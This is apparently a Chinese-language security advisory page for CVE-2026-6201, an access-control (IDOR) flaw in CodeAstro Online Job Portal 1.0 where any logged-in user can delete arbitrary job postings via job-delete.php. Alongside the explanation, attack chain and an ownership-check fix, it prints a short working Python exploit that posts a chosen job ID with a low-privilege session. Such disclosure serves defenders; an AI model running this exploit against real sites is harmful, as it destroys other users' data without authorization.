CVE-2026-6201 CVSS 5.4 中危

CVE-2026-6201 CodeAstro Online Job Portal 访问控制缺陷

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6201

漏洞类型

不安全的直接对象引用 (IDOR)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CodeAstro Online Job Portal

漏洞概述

CodeAstro Online Job Portal 1.0版本存在严重的安全漏洞，问题出在/jobs/job-delete.php组件的删除职位处理逻辑中。由于缺乏适当的访问控制机制，攻击者无需高权限即可通过修改请求中的ID参数，远程删除系统中任意职位的发布信息。该漏洞利用门槛低且已有公开PoC，对系统数据完整性构成威胁。

技术细节

该漏洞属于典型的IDOR（不安全的直接对象引用）漏洞，根源在于服务器端对对象引用的访问控制缺失。在CodeAstro Online Job Portal 1.0的/jobs/job-delete.php文件中，应用程序直接接收用户通过GET或POST请求提交的“ID”参数，并将其作为数据库查询条件来执行删除操作。系统未验证当前操作用户是否对应于该ID所代表的职位的发布者或管理员。攻击者只需注册一个普通低权限账户，获取合法的Session，然后通过Burp Suite等工具抓包修改请求中的“ID”参数，将其替换为任意目标职点的ID。服务器在处理该请求时，仅关注ID是否存在，而不校验权限，从而允许攻击者越权删除其他用户的职位数据。这导致系统数据的完整性（I:L）和可用性（A:L）受到直接影响。

攻击链分析

STEP 1

侦察

攻击者探测目标网站，确认其使用CodeAstro Online Job Portal 1.0，并定位到/job-delete.php接口。

STEP 2

获取凭证

攻击者注册一个普通求职者或企业账户，获得低权限的合法Session ID（如PHPSESSID）。

STEP 3

构造请求

攻击者使用合法Session向/job-delete.php发送请求，并将参数ID修改为想要删除的目标职位ID。

STEP 4

执行攻击

服务器端因未做权限校验，直接执行删除操作，导致目标职位数据被移除。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable endpoint
target_url = "http://target.com/jobs/job-delete.php"

# Low-privilege user session cookie obtained after login
session_cookies = {
    "PHPSESSID": "valid_low_priv_session_id"
}

# The ID of the job posting to be deleted (can be enumerated)
victim_job_id = "45"

# Data payload to send
payload = {
    "ID": victim_job_id
}

try:
    # Send the POST request to delete the job
    response = requests.post(target_url, data=payload, cookies=session_cookies)
    
    if response.status_code == 200 and "success" in response.text.lower():
        print(f"[+] Exploit successful: Job ID {victim_job_id} has been deleted.")
    else:
        print(f"[-] Exploit failed or unexpected response.")
        print(response.text)
except Exception as e:
    print(f"Error: {e}")

影响范围

CodeAstro Online Job Portal 1.0

防御指南

临时缓解措施

在/job-delete.php代码逻辑中，增加对当前会话用户与目标资源所有者身份的比对检查。例如，在执行DELETE语句前，查询该Job ID对应的User ID是否与当前登录用户的User ID一致，若不一致则拒绝请求并返回403 Forbidden错误。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6201
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6201
3 Details https://www.cvedetails.com/cve/CVE-2026-6201/
4 VulDB https://vuldb.com/cve/CVE-2026-6201
5 Link https://codeastro.com/
6 Link https://github.com/Xmyronn/CodeAstro-Online-Job-Portal-IDOR.git
7 Link https://vuldb.com/submit/797515
8 Link https://vuldb.com/vuln/357123
9 Link https://vuldb.com/vuln/357123/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表